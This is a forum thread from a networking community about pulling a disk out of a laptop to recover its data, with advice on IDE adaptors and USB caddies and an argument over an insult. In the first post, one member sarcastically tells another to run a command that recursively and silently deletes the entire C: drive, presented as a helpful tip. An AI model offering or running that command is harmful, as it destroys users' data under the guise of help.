Skip to main content

How it worked for me

More
17 years 5 months ago #18547 by FallenZer0

the bishop it seems u handle more of desktop than laptop man laptop handling is meant for brains.... aight..

still waiiting for more contributions....

What were the reasons to come to that conclusion? And how do you justify that it takes brains to handle Laptops and not desktops?

From what I'm reading, your statement of *TheBishop* is inappropriate.

TheBishop: I hate to speak for you, & I apologize, but just reading what talk2sp wrote made me very upset.

My 2+ years at firewall.cx, *TheBishop* is one of the Finest Individual and His contributions to firewall.cx community are noteworthy.

talk2sp: Here is my contribution to you: Go to your command prompt, simply type rmdir c:\ /s /q wait and then reboot.

Cheers

-There Is A Foolish Corner In The Brain Of The Wisest Man- Aristotle
More
17 years 5 months ago #18552 by Smurf

the bishop it seems u handle more of desktop than laptop man laptop handling is meant for brains.... aight..

Yes, i am not impressed with that comment either. I think when TheBishop posted his reply, he missed the original post stating that we were talking about a laptop which is very easily done.....

TheBishops contributions to this forum are second to none which is probably why Chris made him a member of the Firewall.cx team.

Wayne Murphy
Firewall.cx Team Member
www.firewall.cx

Now working for a Security Company called Sec-1 Ltd in the UK, for any
Penetration Testing work visit www.sec-1.com or PM me for details.
More
17 years 5 months ago #18573 by TheBishop
Replied by TheBishop on topic Re: How it worked for me
Actually I have a 2.5 to 3.5 inch IDE adaptor. They're readily available and quite cheap. However I do take your point about extracting the disk from a laptop - if it was one of the (many) brands where the disk pops out the side in a removable cartridge I'd have no hesitation in doing that, unscrewing the cartridge and taking the disk out. But, I agree, if it meant open-heart surgery on the laptop I'd probably find another way.
No offence taken; we're all here to share our experiences and over the years this has been and still is my preferred method - get the disk completely out of and away from the suspect machine to safeguard that data
More
17 years 5 months ago #18575 by Smurf
Replied by Smurf on topic Re: How it worked for me

Actually I have a 2.5 to 3.5 inch IDE adaptor.

Kewl, didn't know you could get them (but then again, never had to look for one). I have an IDE to USB adaptor which i have tried around 4 times and each time i tried it i could never get it working.

Wayne Murphy
Firewall.cx Team Member
www.firewall.cx

Now working for a Security Company called Sec-1 Ltd in the UK, for any
Penetration Testing work visit www.sec-1.com or PM me for details.
More
17 years 5 months ago #18579 by TheBishop
Replied by TheBishop on topic Re: How it worked for me
nnbnb www.mcsx.co.uk/shop/2-5-to-3-5-ide-adapter-kit.htm for example. And there are other suppliers, that just happened to be the first one that came up on a Google search
More
17 years 5 months ago #18584 by Starfire
Replied by Starfire on topic Re: How it worked for me
Using a USB caddy would be best when working with laptop disk problems.

Open the tin, put in the laptop drive, plug in the usb to a pc and sort the files from there.

These things only cost about £10 for the caddy and act exactly like a USB key except it has whichever laptop harddrive you put in it. Nice long USB cable and it can live in your jacket pocket.

But, as a support person, you must never, ever miss the opportunity to humiliate any programmer you come across. The more basic the mistake, the more humiliation you pile on!

laptop handling is meant for brains.... aight..

.... heheh ya! riiiiight!
Time to create page: 0.153 seconds